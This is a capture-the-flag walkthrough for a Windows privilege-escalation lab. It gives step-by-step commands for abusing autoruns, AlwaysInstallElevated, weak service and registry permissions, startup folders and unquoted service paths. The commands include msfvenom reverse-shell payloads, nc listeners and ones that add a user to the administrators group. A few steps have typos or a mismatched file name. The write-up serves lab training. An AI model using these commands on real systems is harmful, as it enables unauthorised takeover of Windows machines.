# CTF TryHackMe - Windows Privesc Arena

## Registry Escalation - Autorun 

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
2. In Autoruns, click on the ‘Logon’ tab.
3. From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”.
4. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
5. From the output, notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “program.exe” file.

Kali VM

1. msfvenom -p windows/shell_reverse_tcp lhost=[kali machine IP] lport=443 -f exe -o program.exe
2. nc -lnvp 443
2. python3 smbserver.py shared .
3. From windows machine : copy \\IPKALI\shared\promgram.exe


## Registry Escalation - AlwaysInstallElevated 

**Windows VM**

1.Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
2.From the output, notice that “AlwaysInstallElevated” value is 1.
3.In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
4.From the output, notice that “AlwaysInstallElevated” value is 1.

**Kali VM**

1. msfvenom -p windows/shell_reverse_tcp lhost=[kali machine IP] lport=443 -f msi -o setup.msi
2. nc -lnvp 443
2. python3 smbserver.py shared .
3. From windows machine : copy \\IPKALI\shared\promgram.exe
4. Place ‘setup.msi’ in ‘C:\Temp’
5. Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi
6. Reverse shell opened

## Service Escalation - Registry

**Windows VM**

1. Open powershell prompt and type: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
2. Notice that the output suggests that user belong to “NT AUTHORITY\INTERACTIVE” has “FullContol” permission over the registry key.
3. Copy ‘C:\Users\User\Desktop\Tools\Source\windows_service.c’ to the Kali VM.

**Kali VM**

1. Open windows_service.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_service.c -o x.exe (NOTE: if this is not installed, use 'sudo apt install gcc-mingw-w64') 
3. Copy the generated file x.exe, to the Windows VM.

**Windows VM**

1. Place x.exe in ‘C:\Temp’.
2. Open command prompt at type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
3. In the command prompt type: sc start regsvc
4. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

## Service Escalation - Executable Files

**Windows VM**

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
2. Notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the filepermservice.exe file.

*Exploitation*

**Windows VM**

1. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
2. In command prompt type: sc start filepermsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators 

## Privilege Escalation - Startup Applications

**Windows VM**

1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
2. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.

*Exploitation*

**Kali VM**


1. Start a listener with `nc -lvnp 443`
2. Open another command prompt and type: `msfvenom -p windows/shell_reverse_tcp lhost=<KALI IP> lport=443 -f exe -o x.exe`
3. Copy the generated file, x.exe, to the Windows VM.

**Windows VM**

1. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
2. Logoff.
3. Login with the administrator account credentials.

**Kali VM**

1. Wait for a session to be created, it may take a few seconds.


## Service Escalation - binPath

**Windows VM**

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc

2. Notice that the output suggests that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.

*Exploitation*

**Windows VM**

1. In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"
2. In command prompt type: sc start daclsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators 

## Service Escalation - Unquoted Service Paths 

**Windows VM**

1. Open command prompt and type: sc qc unquotedsvc
2. Notice that the “BINARY_PATH_NAME” field displays a path that is not confined between quotes.

*Exploitation*

**Kali VM**

1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows VM.

**Windows VM**

1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

